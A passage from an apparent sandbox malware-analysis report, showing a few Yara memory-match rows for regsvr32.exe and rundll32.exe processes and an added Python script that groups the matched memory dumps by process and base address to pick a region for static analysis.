Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR
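The Yara match lists under "Stealing of Sensitive Information" and "Remote Access Functionality" are the same rows, so one pass over them serves both. The Python below is an added example, not part of the report and not the sample's code: it parses the six-field memory-dump names, groups the hits by process index and base address, and for each process reports the region that matched most often and the region of the latest dump. When those coincide, that region is the one to pull from the analysis for static work. The script reads only the first field (process index) and the fourth (base address) of each name; it treats the third as a dump serial that grows over the run, which is an assumption, and keeps the other three fields opaque because the report does not define them. The input rows are the hits for process indexes 0 and 4 plus the four "Process Memory Space" rows, copied from the list above.

```python
import re
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

# Constructed input: the Yara match rows for process indexes 0 and 4 and the
# four 'Process Memory Space' rows, copied from the list above.
SAMPLE_ROWS = [
    'Source: Yara match File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY',
    'Source: Yara match File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY',
    'Source: Yara match File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY',
    'Source: Yara match File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY',
    'Source: Yara match File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY',
    'Source: Yara match File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY',
    'Source: Yara match File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY',
    'Source: Yara match File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY',
    'Source: Yara match File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY',
    'Source: Yara match File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY',
    'Source: Yara match File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY',
    'Source: Yara match File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY',
    'Source: Yara match File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY',
    'Source: Yara match File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY',
    'Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR',
    'Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR',
    'Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR',
    'Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR',
]

DUMP_RE = re.compile(r'^Source: Yara match File source: (?P<name>[0-9A-F.]+)\.sdmp, type: MEMORY$')
PROC_RE = re.compile(r'^Source: Yara match File source: Process Memory Space: (?P<image>\S+) PID: (?P<pid>\d+), type: MEMORYSTR$')


def parse_dump_name(name: str) -> dict:
    """Split a six-field dump name. Field 0 is the process index inside the analysis
    and field 3 the base address of the dumped region. Field 2 is treated as a dump
    serial that grows over the run (assumption); fields 1, 4 and 5 are kept opaque
    because the report does not define them."""
    fields = name.split('.')
    if len(fields) != 6:
        raise ValueError(f'unexpected dump name: {name}')
    return {'proc': int(fields[0]), 'serial': int(fields[2]), 'base': int(fields[3], 16),
            'opaque': (fields[1], fields[4], fields[5])}


def summarize(rows: List[str]) -> dict:
    dumps: Dict[int, List[dict]] = defaultdict(list)
    named: List[Tuple[str, int]] = []
    for row in rows:
        row = row.strip()
        if m := DUMP_RE.match(row):
            d = parse_dump_name(m['name'])
            dumps[d['proc']].append(d)
        elif m := PROC_RE.match(row):
            named.append((m['image'], int(m['pid'])))
    processes = {}
    for proc, items in sorted(dumps.items()):
        per_base = Counter(d['base'] for d in items)
        hot_base, hot_hits = per_base.most_common(1)[0]
        latest = max(items, key=lambda d: d['serial'])
        processes[proc] = {
            'hits': len(items),
            'regions': len(per_base),
            'hot_region': hot_base,
            'hot_region_hits': hot_hits,
            'latest_region': latest['base'],
            # A region that keeps matching and is also the last one dumped is the
            # best candidate to pull for static work (config extraction, diffing).
            'stable': hot_base == latest['base'],
        }
    return {'processes': processes, 'named_processes': named}


if __name__ == '__main__':
    report = summarize(SAMPLE_ROWS)
    for proc, info in report['processes'].items():
        print(f"process {proc}: {info['hits']} hits in {info['regions']} regions, "
              f"hot region 0x{info['hot_region']:X} ({info['hot_region_hits']} hits), "
              f"latest 0x{info['latest_region']:X}, stable={info['stable']}")
    print('named processes:', report['named_processes'])
```

On these rows each of the two processes has seven hits in four regions, and in each the region hit four times (0x372D000 in process 0, 0x557D000 in process 4) is also the latest dump. The report does not state which process index corresponds to which of the four named PIDs, so the script keeps the two lists separate rather than guessing a mapping.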